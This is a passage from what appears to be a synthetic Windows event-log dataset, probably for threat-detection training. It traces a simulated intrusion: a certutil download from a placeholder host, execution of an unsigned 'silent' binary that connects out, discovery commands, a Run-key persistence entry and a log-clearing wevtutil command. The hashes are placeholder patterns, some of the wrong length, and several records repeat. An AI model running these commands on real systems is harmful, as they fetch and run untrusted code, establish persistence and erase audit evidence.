    "parent_pid": 4316,
    "pid": 22940,
    "command_line": "mmc.exe eventvwr.msc",
    "registry_path": null,
    "network_ip": null,
    "network_port": null,
    "action": "Process created",
    "hash_sha256": "c7283940561728394056172839405617283940561728394056172839405617",
    "signed": true,
    "severity": "Information",
    "description": "A process creation event was recorded.",
    "source": "Windows ETW Process Monitoring"
  },

  {
    "event_id": 4688,
    "timestamp": "2026-07-10T12:22:19Z",
    "computer_name": "ANONYMOUS-WS01",
    "channel": "Security",
    "provider": "Microsoft-Windows-Security-Auditing",
    "level": "Information",
    "user": "administrator",
    "domain": "SECURITY",
    "logon_id": "0x4BC221",
    "process_name": "C:\\Windows\\System32\\net.exe",
    "image_path": "C:\\Windows\\System32\\net.exe",
    "parent_process": "C:\\Windows\\System32\\cmd.exe",
    "parent_pid": 7440,
    "pid": 23312,
    "command_line": "net user",
    "registry_path": null,
    "network_ip": null,
    "network_port": null,
    "action": "Process created",
    "hash_sha256": "d8394056172839405617283940561728394056172839405617283940561728",
    "signed": true,
    "severity": "Information",
    "description": "A process creation event was recorded.",
    "source": "Windows ETW Process Monitoring"
  },

  {
    "event_id": 4688,
    "timestamp": "2026-07-10T12:27:41Z",
    "computer_name": "ANONYMOUS-WS01",
    "channel": "Security",
    "provider": "Microsoft-Windows-Security-Auditing",
    "level": "Information",
    "user": "j.smith",
    "domain": "SECURITY",
    "logon_id": "0x12FA91",
    "process_name": "C:\\Windows\\System32\\certutil.exe",
    "image_path": "C:\\Windows\\System32\\certutil.exe",
    "parent_process": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
    "parent_pid": 21144,
    "pid": 23816,
    "command_line": "certutil.exe -urlcache -split -f https://files.example.org/data.bin C:\\Users\\j.smith\\AppData\\Local\\Temp\\data.bin",
    "registry_path": null,
    "network_ip": "172.67.10.21",
    "network_port": 443,
    "action": "Process created",
    "hash_sha256": "e9405617283940561728394056172839405617283940561728394056172839",
    "signed": true,
    "severity": "Information",
    "description": "A process creation event was recorded.",
    "source": "Windows ETW Process Monitoring"
  },

  {
    "event_id": 11,
    "timestamp": "2026-07-10T12:28:05Z",
    "computer_name": "ANONYMOUS-WS01",
    "channel": "Microsoft-Windows-Sysmon/Operational",
    "provider": "Sysmon",
    "level": "Information",
    "user": "j.smith",
    "domain": "SECURITY",
    "logon_id": "0x12FA91",
    "process_name": "C:\\Users\\j.smith\\AppData\\Local\\Temp\\data.bin",
    "image_path": "C:\\Users\\j.smith\\AppData\\Local\\Temp\\data.bin",
    "parent_process": "C:\\Windows\\System32\\certutil.exe",
    "parent_pid": 23816,
    "pid": 24004,
    "command_line": "data.bin",
    "registry_path": null,
    "network_ip": null,
    "network_port": null,
    "action": "File created",
    "hash_sha256": "f0517283940561728394056172839405617283940561728394056172839405",
    "signed": false,
    "severity": "Information",
    "description": "A file system event was recorded.",
    "source": "Sysmon File Monitoring"
  },

  {
    "event_id": 7036,
    "timestamp": "2026-07-10T12:35:14Z",
    "computer_name": "ANONYMOUS-WS01",
    "channel": "System",
    "provider": "Service Control Manager",
    "level": "Information",
    "user": "NT AUTHORITY\\SYSTEM",
    "domain": "NT AUTHORITY",
    "logon_id": "0x3E7",
    "process_name": "C:\\Windows\\System32\\services.exe",
    "image_path": "C:\\Windows\\System32\\svchost.exe",
    "parent_process": "C:\\Windows\\System32\\services.exe",
    "parent_pid": 956,
    "pid": 24840,
    "command_line": "svchost.exe -k LocalService",
    "registry_path": "HKLM\\SYSTEM\\CurrentControlSet\\Services\\wuauserv",
    "network_ip": null,
    "network_port": null,
    "action": "Service state changed",
    "hash_sha256": "06172839405617283940561728394056172839405617283940561728394056",
    "signed": true,
    "severity": "Information",
    "description": "A service state change was recorded.",
    "source": "Windows Service Control Manager"
  },

  {
    "event_id": 4688,
    "timestamp": "2026-07-10T12:42:51Z",
    "computer_name": "ANONYMOUS-WS01",
    "channel": "Security",
    "provider": "Microsoft-Windows-Security-Auditing",
    "level": "Information",
    "user": "j.smith",
    "domain": "SECURITY",
    "logon_id": "0x12FA91",
    "process_name": "C:\\Users\\j.smith\\AppData\\Local\\Temp\\data.bin",
    "image_path": "C:\\Users\\j.smith\\AppData\\Local\\Temp\\data.bin",
    "parent_process": "C:\\Windows\\System32\\certutil.exe",
    "parent_pid": 23816,
    "pid": 24004,
    "command_line": "data.bin --silent",
    "registry_path": null,
    "network_ip": "185.199.109.153",
    "network_port": 443,
    "action": "Process created",
    "hash_sha256": "f0517283940561728394056172839405617283940561728394056172839405",
    "signed": false,
    "severity": "Information",
    "description": "A process creation event was recorded.",
    "source": "Windows ETW Process Monitoring"
  },
  {
    "event_id": 4688,
    "timestamp": "2026-07-10T12:47:08Z",
    "computer_name": "ANONYMOUS-WS01",
    "channel": "Security",
    "provider": "Microsoft-Windows-Security-Auditing",
    "level": "Information",
    "user": "j.smith",
    "domain": "SECURITY",
    "logon_id": "0x12FA91",
    "process_name": "C:\\Windows\\System32\\whoami.exe",
    "image_path": "C:\\Windows\\System32\\whoami.exe",
    "parent_process": "C:\\Windows\\System32\\cmd.exe",
    "parent_pid": 23312,
    "pid": 25420,
    "command_line": "whoami /all",
    "registry_path": null,
    "network_ip": null,
    "network_port": null,
    "action": "Process created",
    "hash_sha256": "1728394056172839405617283940561728394056172839405617283940561728",
    "signed": true,
    "severity": "Information",
    "description": "A process creation event was recorded.",
    "source": "Windows ETW Process Monitoring"
  },

  {
    "event_id": 4688,
    "timestamp": "2026-07-10T12:50:33Z",
    "computer_name": "ANONYMOUS-WS01",
    "channel": "Security",
    "provider": "Microsoft-Windows-Security-Auditing",
    "level": "Information",
    "user": "j.smith",
    "domain": "SECURITY",
    "logon_id": "0x12FA91",
    "process_name": "C:\\Windows\\System32\\cmd.exe",
    "image_path": "C:\\Windows\\System32\\cmd.exe",
    "parent_process": "C:\\Users\\j.smith\\AppData\\Local\\Temp\\data.bin",
    "parent_pid": 24004,
    "pid": 25904,
    "command_line": "cmd.exe /c netstat -ano",
    "registry_path": null,
    "network_ip": null,
    "network_port": null,
    "action": "Process created",
    "hash_sha256": "2839405617283940561728394056172839405617283940561728394056172839",
    "signed": true,
    "severity": "Information",
    "description": "A process creation event was recorded.",
    "source": "Windows ETW Process Monitoring"
  },

  {
    "event_id": 5156,
    "timestamp": "2026-07-10T12:52:04Z",
    "computer_name": "ANONYMOUS-WS01",
    "channel": "Security",
    "provider": "Microsoft-Windows-Windows Filtering Platform",
    "level": "Information",
    "user": "j.smith",
    "domain": "SECURITY",
    "logon_id": "0x12FA91",
    "process_name": "C:\\Users\\j.smith\\AppData\\Local\\Temp\\data.bin",
    "image_path": "C:\\Users\\j.smith\\AppData\\Local\\Temp\\data.bin",
    "parent_process": "C:\\Windows\\System32\\certutil.exe",
    "parent_pid": 23816,
    "pid": 24004,
    "command_line": "data.bin --silent",
    "registry_path": null,
    "network_ip": "185.199.109.153",
    "network_port": 443,
    "action": "Network connection allowed",
    "hash_sha256": "f0517283940561728394056172839405617283940561728394056172839405",
    "signed": false,
    "severity": "Information",
    "description": "A network connection was permitted.",
    "source": "Windows Firewall Event Log"
  },

  {
    "event_id": 4688,
    "timestamp": "2026-07-10T13:01:19Z",
    "computer_name": "ANONYMOUS-WS01",
    "channel": "Security",
    "provider": "Microsoft-Windows-Security-Auditing",
    "level": "Information",
    "user": "administrator",
    "domain": "SECURITY",
    "logon_id": "0x4BC221",
    "process_name": "C:\\Windows\\System32\\cleanmgr.exe",
    "image_path": "C:\\Windows\\System32\\cleanmgr.exe",
    "parent_process": "C:\\Windows\\explorer.exe",
    "parent_pid": 4316,
    "pid": 26412,
    "command_line": "cleanmgr.exe /AUTOCLEAN",
    "registry_path": null,
    "network_ip": null,
    "network_port": null,
    "action": "Process created",
    "hash_sha256": "3940561728394056172839405617283940561728394056172839405617283940",
    "signed": true,
    "severity": "Information",
    "description": "A process creation event was recorded.",
    "source": "Windows ETW Process Monitoring"
  },

  {
    "event_id": 4657,
    "timestamp": "2026-07-10T13:05:41Z",
    "computer_name": "ANONYMOUS-WS01",
    "channel": "Security",
    "provider": "Microsoft-Windows-Security-Auditing",
    "level": "Information",
    "user": "j.smith",
    "domain": "SECURITY",
    "logon_id": "0x12FA91",
    "process_name": "C:\\Users\\j.smith\\AppData\\Roaming\\Microsoft\\Windows\\update.exe",
    "image_path": "C:\\Users\\j.smith\\AppData\\Roaming\\Microsoft\\Windows\\update.exe",
    "parent_process": "C:\\Windows\\explorer.exe",
    "parent_pid": 4316,
    "pid": 11452,
    "command_line": "update.exe --silent",
    "registry_path": "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\WindowsUpdate",
    "network_ip": null,
    "network_port": null,
    "action": "Registry value modified",
    "hash_sha256": "b7f2a98c31d4e8f9123d8f7a2d9f8c7b6a5e4d3c2b1a00998877665544332211",
    "signed": false,
    "severity": "Information",
    "description": "A registry modification event was recorded.",
    "source": "Windows ETW Registry Monitoring"
  },

  {
    "event_id": 4697,
    "timestamp": "2026-07-10T13:11:26Z",
    "computer_name": "ANONYMOUS-WS01",
    "channel": "Security",
    "provider": "Microsoft-Windows-Security-Auditing",
    "level": "Information",
    "user": "administrator",
    "domain": "SECURITY",
    "logon_id": "0x4BC221",
    "process_name": "C:\\Windows\\System32\\sc.exe",
    "image_path": "C:\\Windows\\System32\\sc.exe",
    "parent_process": "C:\\Windows\\System32\\cmd.exe",
    "parent_pid": 7440,
    "pid": 27108,
    "command_line": "sc query",
    "registry_path": "HKLM\\SYSTEM\\CurrentControlSet\\Services",
    "network_ip": null,
    "network_port": null,
    "action": "Service query",
    "hash_sha256": "4056172839405617283940561728394056172839405617283940561728394056",
    "signed": true,
    "severity": "Information",
    "description": "A service query event was recorded.",
    "source": "Windows Service Control Manager"
  },

  {
    "event_id": 4688,
    "timestamp": "2026-07-10T13:18:54Z",
    "computer_name": "ANONYMOUS-WS01",
    "channel": "Security",
    "provider": "Microsoft-Windows-Security-Auditing",
    "level": "Information",
    "user": "j.smith",
    "domain": "SECURITY",
    "logon_id": "0x12FA91",
    "process_name": "C:\\Windows\\System32\\reg.exe",
    "image_path": "C:\\Windows\\System32\\reg.exe",
    "parent_process": "C:\\Windows\\System32\\cmd.exe",
    "parent_pid": 25904,
    "pid": 27880,
    "command_line": "reg delete HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v TempEntry",
    "registry_path": "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\TempEntry",
    "network_ip": null,
    "network_port": null,
    "action": "Registry value modified",
    "hash_sha256": "5167283940561728394056172839405617283940561728394056172839405617",
    "signed": true,
    "severity": "Information",
    "description": "A registry modification event was recorded.",
    "source": "Windows ETW Registry Monitoring"
  }, 
  {
    "event_id": 4624,
    "timestamp": "2026-07-10T13:25:07Z",
    "computer_name": "ANONYMOUS-WS01",
    "channel": "Security",
    "provider": "Microsoft-Windows-Security-Auditing",
    "level": "Information",
    "user": "j.smith",
    "domain": "SECURITY",
    "logon_id": "0x55DA21",
    "process_name": "C:\\Windows\\System32\\winlogon.exe",
    "image_path": "C:\\Windows\\System32\\winlogon.exe",
    "parent_process": "C:\\Windows\\System32\\smss.exe",
    "parent_pid": 512,
    "pid": 844,
    "command_line": "winlogon.exe",
    "registry_path": null,
    "network_ip": "192.168.1.25",
    "network_port": 0,
    "action": "User logon",
    "hash_sha256": "6273849506172839405617283940561728394056172839405617283940561728",
    "signed": true,
    "severity": "Information",
    "description": "A user authentication event was recorded.",
    "source": "Windows Security Event Log"
  },

  {
    "event_id": 4688,
    "timestamp": "2026-07-10T13:27:44Z",
    "computer_name": "ANONYMOUS-WS01",
    "channel": "Security",
    "provider": "Microsoft-Windows-Security-Auditing",
    "level": "Information",
    "user": "administrator",
    "domain": "SECURITY",
    "logon_id": "0x4BC221",
    "process_name": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
    "image_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
    "parent_process": "C:\\Windows\\explorer.exe",
    "parent_pid": 4316,
    "pid": 28540,
    "command_line": "powershell.exe Get-WinEvent -LogName Security -MaxEvents 20",
    "registry_path": null,
    "network_ip": null,
    "network_port": null,
    "action": "Process created",
    "hash_sha256": "7384950617283940561728394056172839405617283940561728394056172839",
    "signed": true,
    "severity": "Information",
    "description": "A process creation event was recorded.",
    "source": "Windows ETW Process Monitoring"
  },

  {
    "event_id": 1102,
    "timestamp": "2026-07-10T13:31:19Z",
    "computer_name": "ANONYMOUS-WS01",
    "channel": "Security",
    "provider": "Microsoft-Windows-Eventlog",
    "level": "Information",
    "user": "administrator",
    "domain": "SECURITY",
    "logon_id": "0x4BC221",
    "process_name": "C:\\Windows\\System32\\wevtutil.exe",
    "image_path": "C:\\Windows\\System32\\wevtutil.exe",
    "parent_process": "C:\\Windows\\System32\\cmd.exe",
    "parent_pid": 29004,
    "pid": 29112,
    "command_line": "wevtutil.exe cl Application",
    "registry_path": null,
    "network_ip": null,
    "network_port": null,
    "action": "Event log operation",
    "hash_sha256": "8495061728394056172839405617283940561728394056172839405617283940",
    "signed": true,
    "severity": "Information",
    "description": "An event log operation was recorded.",
    "source": "Windows Event Log"
  },

  {
    "event_id": 4688,
    "timestamp": "2026-07-10T13:38:52Z",
    "computer_name": "ANONYMOUS-WS01",
    "channel": "Security",
    "provider": "Microsoft-Windows-Security-Auditing",
    "level": "Information",
    "user": "NT AUTHORITY\\SYSTEM",
    "domain": "NT AUTHORITY",
    "logon_id": "0x3E7",
    "process_name": "C:\\Program Files\\Windows Defender\\MpCmdRun.exe",
    "image_path": "C:\\Program Files\\Windows Defender\\MpCmdRun.exe",
    "parent_process": "C:\\Windows\\System32\\svchost.exe",
    "parent_pid": 1024,
    "pid": 29884,
    "command_line": "MpCmdRun.exe -Scan -ScanType 1",
    "registry_path": null,
    "network_ip": null,
    "network_port": null,
    "action": "Process created",
    "hash_sha256": "9506172839405617283940561728394056172839405617283940561728394056",
    "signed": true,
    "severity": "Information",
    "description": "A process creation event was recorded.",
    "source": "Windows ETW Process Monitoring"
  },

  {
    "event_id": 4634,
    "timestamp": "2026-07-10T13:45:20Z",
    "computer_name": "ANONYMOUS-WS01",
    "channel": "Security",
    "provider": "Microsoft-Windows-Security-Auditing",
    "level": "Information",
    "user": "j.smith",
    "domain": "SECURITY",
    "logon_id": "0x55DA21",
    "process_name": "C:\\Windows\\System32\\winlogon.exe",
    "image_path": "C:\\Windows\\System32\\winlogon.exe",
    "parent_process": "C:\\Windows\\System32\\smss.exe",
    "parent_pid": 512,
    "pid": 844,
    "command_line": "winlogon.exe",
    "registry_path": null,
    "network_ip": null,
    "network_port": null,
    "action": "User logoff",
    "hash_sha256": "a6172839405617283940561728394056172839405617283940561728394056",
    "signed": true,
    "severity": "Information",
    "description": "A user session ended.",
    "source": "Windows Security Event Log"
  },
  {
    "event_id":4624,
    "timestamp":"2026-07-11T07:42:11Z",
    "computer_name":"FINANCE-LAPTOP07",
    "channel":"Security",
    "provider":"Microsoft-Windows-Security-Auditing",
    "level":"Information",
    "user":"m.wilson",
    "domain":"CORP",
    "logon_id":"0x7812A",
    "process_name":"C:\\Windows\\System32\\winlogon.exe",
    "image_path":"C:\\Windows\\System32\\winlogon.exe",
    "parent_process":"C:\\Windows\\System32\\smss.exe",
    "parent_pid":512,
    "pid":864,
    "command_line":"winlogon.exe",
    "registry_path":null,
    "network_ip":"192.168.10.44",
    "network_port":0,
    "action":"User logon",
    "hash_sha256":"ab11223344556677889900aabbccddeeff11223344556677889900aabbccdd",
    "signed":true,
    "severity":"Information",
    "description":"A user authentication event was recorded.",
    "source":"Windows Security Event Log"
  },

  {
    "event_id":4688,
    "timestamp":"2026-07-11T07:42:34Z",
    "computer_name":"FINANCE-LAPTOP07",
    "channel":"Security",
    "provider":"Microsoft-Windows-Security-Auditing",
    "level":"Information",
    "user":"m.wilson",
    "domain":"CORP",
    "logon_id":"0x7812A",
    "process_name":"C:\\Windows\\explorer.exe",
    "image_path":"C:\\Windows\\explorer.exe",
    "parent_process":"C:\\Windows\\System32\\userinit.exe",
    "parent_pid":1240,
    "pid":4428,
    "command_line":"explorer.exe",
    "registry_path":null,
    "network_ip":null,
    "network_port":null,
    "action":"Process created",
    "hash_sha256":"bc223344556677889900aabbccddeeff223344556677889900aabbccddeeff",
    "signed":true,
    "severity":"Information",
    "description":"A process creation event was recorded.",
    "source":"Windows ETW Process Monitoring"
  },

  {
    "event_id":4688,
    "timestamp":"2026-07-11T07:45:02Z",
    "computer_name":"FINANCE-LAPTOP07",
    "channel":"Security",
    "provider":"Microsoft-Windows-Security-Auditing",
    "level":"Information",
    "user":"m.wilson",
    "domain":"CORP",
    "logon_id":"0x7812A",
    "process_name":"C:\\Program Files\\Microsoft Office\\root\\Office16\\OUTLOOK.EXE",
    "image_path":"C:\\Program Files\\Microsoft Office\\root\\Office16\\OUTLOOK.EXE",
    "parent_process":"C:\\Windows\\explorer.exe",
    "parent_pid":4428,
    "pid":5216,
    "command_line":"OUTLOOK.EXE",
    "registry_path":null,
    "network_ip":"10.10.5.20",
    "network_port":443,
    "action":"Process created",
    "hash_sha256":"cd33445566778899001122334455667788990011223344556677889900aabb",
    "signed":true,
    "severity":"Information",
    "description":"A process creation event was recorded.",
    "source":"Windows ETW Process Monitoring"
  },

  {
    "event_id":5156,
    "timestamp":"2026-07-11T07:45:15Z",
    "computer_name":"FINANCE-LAPTOP07",
    "channel":"Security",
    "provider":"Microsoft-Windows-Windows Filtering Platform",
    "level":"Information",
    "user":"m.wilson",
    "domain":"CORP",
    "logon_id":"0x7812A",
    "process_name":"C:\\Program Files\\Microsoft Office\\root\\Office16\\OUTLOOK.EXE",
    "image_path":"C:\\Program Files\\Microsoft Office\\root\\Office16\\OUTLOOK.EXE",
    "parent_process":"C:\\Windows\\explorer.exe",
    "parent_pid":4428,
    "pid":5216,
    "command_line":"OUTLOOK.EXE",
    "registry_path":null,
    "network_ip":"10.10.5.20",
    "network_port":443,
    "action":"Network connection allowed",
    "hash_sha256":"cd33445566778899001122334455667788990011223344556677889900aabb",
    "signed":true,
    "severity":"Information",
    "description":"A network connection was permitted.",
    "source":"Windows Firewall Event Log"
  }, 
  {
    "event_id":4624,
    "timestamp":"2026-07-11T07:42:11Z",
    "computer_name":"FINANCE-LAPTOP07",
    "channel":"Security",
    "provider":"Microsoft-Windows-Security-Auditing",
    "level":"Information",
    "user":"m.wilson",
    "domain":"CORP",
    "logon_id":"0x7812A",
    "process_name":"C:\\Windows\\System32\\winlogon.exe",
    "image_path":"C:\\Windows\\System32\\winlogon.exe",
    "parent_process":"C:\\Windows\\System32\\smss.exe",
    "parent_pid":512,
    "pid":864,
    "command_line":"winlogon.exe",
    "registry_path":null,
    "network_ip":"192.168.10.44",
    "network_port":0,
    "action":"User logon",
    "hash_sha256":"ab11223344556677889900aabbccddeeff11223344556677889900aabbccdd",
    "signed":true,
    "severity":"Information",
    "description":"A user authentication event was recorded.",
    "source":"Windows Security Event Log"
  },

  {
    "event_id":4688,
    "timestamp":"2026-07-11T07:42:34Z",
    "computer_name":"FINANCE-LAPTOP07",
    "channel":"Security",
    "provider":"Microsoft-Windows-Security-Auditing",
    "level":"Information",
    "user":"m.wilson",
    "domain":"CORP",
    "logon_id":"0x7812A",
    "process_name":"C:\\Windows\\explorer.exe",
    "image_path":"C:\\Windows\\explorer.exe",
    "parent_process":"C:\\Windows\\System32\\userinit.exe",
    "parent_pid":1240,
    "pid":4428,
    "command_line":"explorer.exe",
    "registry_path":null,
    "network_ip":null,
    "network_port":null,
    "action":"Process created",
    "hash_sha256":"bc223344556677889900aabbccddeeff223344556677889900aabbccddeeff",
    "signed":true,
    "severity":"Information",
    "description":"A process creation event was recorded.",
    "source":"Windows ETW Process Monitoring"
  },

  {
    "event_id":4688,
    "timestamp":"2026-07-11T07:44:10Z",
    "computer_name":"FINANCE-LAPTOP07",
    "channel":"Security",
    "provider":"Microsoft-Windows-Security-Auditing",
    "level":"Information",
    "user":"m.wilson",
    "domain":"CORP",
    "logon_id":"0x7812A",
    "process_name":"C:\\Program Files\\Microsoft Office\\root\\Office16\\OUTLOOK.EXE",
    "image_path":"C:\\Program Files\\Microsoft Office\\root\\Office16\\OUTLOOK.EXE",
    "parent_process":"C:\\Windows\\explorer.exe",
    "parent_pid":4428,
    "pid":5216,
    "command_line":"OUTLOOK.EXE",
    "registry_path":null,
    "network_ip":"10.10.5.20",
    "network_port":443,
    "action":"Process created",
    "hash_sha256":"cd33445566778899001122334455667788990011223344556677889900aabb",
    "signed":true,
    "severity":"Information",
    "description":"A process creation event was recorded.",
    "source":"Windows ETW Process Monitoring"
  },

  {
    "event_id":5156,
    "timestamp":"2026-07-11T07:44:22Z",
    "computer_name":"FINANCE-LAPTOP07",
    "channel":"Security",
    "provider":"Microsoft-Windows-Windows Filtering Platform",
    "level":"Information",
    "user":"m.wilson",
    "domain":"CORP",
    "logon_id":"0x7812A",
    "process_name":"C:\\Program Files\\Microsoft Office\\root\\Office16\\OUTLOOK.EXE",
    "image_path":"C:\\Program Files\\Microsoft Office\\root\\Office16\\OUTLOOK.EXE",
    "parent_process":"C:\\Windows\\explorer.exe",
    "parent_pid":4428,
    "pid":5216,
    "command_line":"OUTLOOK.EXE",
    "registry_path":null,
    "network_ip":"10.10.5.20",
    "network_port":443,
    "action":"Network connection allowed",
    "hash_sha256":"cd33445566778899001122334455667788990011223344556677889900aabb",
    "signed":true,
    "severity":"Information",
    "description":"A network connection was permitted.",
    "source":"Windows Firewall Event Log"
  },

  {
    "event_id":4688,
    "timestamp":"2026-07-11T07:46:03Z",
    "computer_name":"FINANCE-LAPTOP07",
    "channel":"Security",
    "provider":"Microsoft-Windows-Security-Auditing",
    "level":"Information",
    "user":"m.wilson",
    "domain":"CORP",
    "logon_id":"0x7812A",
    "process_name":"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe",
    "image_path":"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe",
    "parent_process":"C:\\Windows\\explorer.exe",
    "parent_pid":4428,
    "pid":6032,
    "command_line":"chrome.exe https://intranet.corp.local",
    "registry_path":null,
    "network_ip":"10.10.1.15",
    "network_port":443,
    "action":"Process created",
    "hash_sha256":"de445566778899001122334455667788990011223344556677889900aabbcc",
    "signed":true,
    "severity":"Information",
    "description":"A process creation event was recorded.",
    "source":"Windows ETW Process Monitoring"
  }, 
  {
    "event_id":5156,
    "timestamp":"2026-07-11T07:46:21Z",
    "computer_name":"FINANCE-LAPTOP07",
    "channel":"Security",
    "provider":"Microsoft-Windows-Windows Filtering Platform",
    "level":"Information",
    "user":"m.wilson",
    "domain":"CORP",
    "logon_id":"0x7812A",
    "process_name":"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe",
    "image_path":"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe",
    "parent_process":"C:\\Windows\\explorer.exe",
    "parent_pid":4428,
    "pid":6032,
    "command_line":"chrome.exe https://intranet.corp.local",
    "registry_path":null,
    "network_ip":"10.10.1.15",
    "network_port":443,
    "action":"Network connection allowed",
    "hash_sha256":"de445566778899001122334455667788990011223344556677889900aabbcc",
    "signed":true,
    "severity":"Information",
    "description":"A network connection was permitted.",
    "source":"Windows Firewall Event Log"
  },

  {
    "event_id":4688,
    "timestamp":"2026-07-11T07:51:42Z",
    "computer_name":"FINANCE-LAPTOP07",
    "channel":"Security",
    "provider":"Microsoft-Windows-Security-Auditing",
    "level":"Information",
    "user":"m.wilson",
    "domain":"CORP",
    "logon_id":"0x7812A",
    "process_name":"C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE",
    "image_path":"C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE",
    "parent_process":"C:\\Program Files\\Microsoft Office\\root\\Office16\\OUTLOOK.EXE",
    "parent_pid":5216,
    "pid":7016,
    "command_line":"WINWORD.EXE \"Q4_Financial_Report.docx\"",
    "registry_path":null,
    "network_ip":null,
    "network_port":null,
    "action":"Process created",
    "hash_sha256":"ef5566778899001122334455667788990011223344556677889900aabbccddeeff",
    "signed":true,
    "severity":"Information",
    "description":"A process creation event was recorded.",
    "source":"Windows ETW Process Monitoring"
  },

  {
    "event_id":4104,
    "timestamp":"2026-07-11T07:52:01Z",
    "computer_name":"FINANCE-LAPTOP07",
    "channel":"Microsoft-Windows-PowerShell/Operational",
    "provider":"PowerShell",
    "level":"Information",
    "user":"m.wilson",
    "domain":"CORP",
    "logon_id":"0x7812A",
    "process_name":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
    "image_path":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
    "parent_process":"C:\\Windows\\explorer.exe",
    "parent_pid":4428,
    "pid":7440,
    "command_line":"powershell.exe Get-Date",
    "registry_path":null,
    "network_ip":null,
    "network_port":null,
    "action":"PowerShell script block logged",
    "hash_sha256":"fa66778899001122334455667788990011223344556677889900aabbccddeeff",
    "signed":true,
    "severity":"Information",
    "description":"PowerShell script execution was recorded.",
    "source":"PowerShell Operational Log"
  },

  {
    "event_id":4688,
    "timestamp":"2026-07-11T08:03:28Z",
    "computer_name":"FINANCE-LAPTOP07",
    "channel":"Security",
    "provider":"Microsoft-Windows-Security-Auditing",
    "level":"Information",
    "user":"m.wilson",
    "domain":"CORP",
    "logon_id":"0x7812A",
    "process_name":"C:\\Windows\\System32\\msiexec.exe",
    "image_path":"C:\\Windows\\System32\\msiexec.exe",
    "parent_process":"C:\\Windows\\explorer.exe",
    "parent_pid":4428,
    "pid":8128,
    "command_line":"msiexec.exe /i C:\\Users\\m.wilson\\Downloads\\PrinterDriverSetup.msi",
    "registry_path":null,
    "network_ip":null,
    "network_port":null,
    "action":"Process created",
    "hash_sha256":"fb778899001122334455667788990011223344556677889900aabbccddeeff",
    "signed":true,
    "severity":"Information",
    "description":"A process creation event was recorded.",
    "source":"Windows ETW Process Monitoring"
  },

  {
    "event_id":7045,
    "timestamp":"2026-07-11T08:04:10Z",
    "computer_name":"FINANCE-LAPTOP07",
    "channel":"System",
    "provider":"Service Control Manager",
    "level":"Information",
    "user":"NT AUTHORITY\\SYSTEM",
    "domain":"NT AUTHORITY",
    "logon_id":"0x3E7",
    "process_name":"C:\\Windows\\System32\\services.exe",
    "image_path":"C:\\Program Files\\PrinterTools\\printerservice.exe",
    "parent_process":"C:\\Windows\\System32\\services.exe",
    "parent_pid":956,
    "pid":8344,
    "command_line":"printerservice.exe -service",
    "registry_path":"HKLM\\SYSTEM\\CurrentControlSet\\Services\\PrinterTools",
    "network_ip":null,
    "network_port":null,
    "action":"Service installed",
    "hash_sha256":"ac8899001122334455667788990011223344556677889900aabbccddeeff11",
    "signed":true,
    "severity":"Information",
    "description":"A service installation event was recorded.",
    "source":"Windows Service Control Manager"
  },
  {
    "event_id":4688,
    "timestamp":"2026-07-11T08:12:44Z",
    "computer_name":"FINANCE-LAPTOP07",
    "channel":"Security",
    "provider":"Microsoft-Windows-Security-Auditing",
    "level":"Information",
    "user":"m.wilson",
    "domain":"CORP",
    "logon_id":"0x7812A",
    "process_name":"C:\\Windows\\System32\\svchost.exe",
    "image_path":"C:\\Windows\\System32\\svchost.exe",
    "parent_process":"C:\\Windows\\System32\\services.exe",
    "parent_pid":956,
    "pid":9020,
    "command_line":"svchost.exe -k netsvcs",
    "registry_path":"HKLM\\SYSTEM\\CurrentControlSet\\Services",
    "network_ip":null,
    "network_port":null,
    "action":"Process created",
    "hash_sha256":"bd99001122334455667788990011223344556677889900aabbccddeeff1122",
    "signed":true,
    "severity":"Information",
    "description":"A process creation event was recorded.",
    "source":"Windows ETW Process Monitoring"
  },

  {
    "event_id":4663,
    "timestamp":"2026-07-11T08:18:03Z",
    "computer_name":"FINANCE-LAPTOP07",
    "channel":"Security",
    "provider":"Microsoft-Windows-Security-Auditing",
    "level":"Information",
    "user":"m.wilson",
    "domain":"CORP",
    "logon_id":"0x7812A",
    "process_name":"C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE",
    "image_path":"C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE",
    "parent_process":"C:\\Program Files\\Microsoft Office\\root\\Office16\\OUTLOOK.EXE",
    "parent_pid":5216,
    "pid":7016,
    "command_line":"WINWORD.EXE \"Q4_Financial_Report.docx\"",
    "registry_path":null,
    "network_ip":null,
    "network_port":null,
    "action":"File accessed",
    "hash_sha256":"ef5566778899001122334455667788990011223344556677889900aabbccddeeff",
    "signed":true,
    "severity":"Information",
    "description":"A file access event was recorded.",
    "source":"Windows File Auditing"
  },

  {
    "event_id":4688,
    "timestamp":"2026-07-11T08:23:17Z",
    "computer_name":"FINANCE-LAPTOP07",
    "channel":"Security",
    "provider":"Microsoft-Windows-Security-Auditing",
    "level":"Information",
    "user":"m.wilson",
    "domain":"CORP",
    "logon_id":"0x7812A",
    "process_name":"C:\\Users\\m.wilson\\Downloads\\Invoice_Review.exe",
    "image_path":"C:\\Users\\m.wilson\\Downloads\\Invoice_Review.exe",
    "parent_process":"C:\\Windows\\explorer.exe",
    "parent_pid":4428,
    "pid":10244,
    "command_line":"Invoice_Review.exe",
    "registry_path":null,
    "network_ip":null,
    "network_port":null,
    "action":"Process created",
    "hash_sha256":"ce001122334455667788990011223344556677889900aabbccddeeff2233",
    "signed":false,
    "severity":"Information",
    "description":"A process creation event was recorded.",
    "source":"Windows ETW Process Monitoring"
  },

  {
    "event_id":5156,
    "timestamp":"2026-07-11T08:23:34Z",
    "computer_name":"FINANCE-LAPTOP07",
    "channel":"Security",
    "provider":"Microsoft-Windows-Windows Filtering Platform",
    "level":"Information",
    "user":"m.wilson",
    "domain":"CORP",
    "logon_id":"0x7812A",
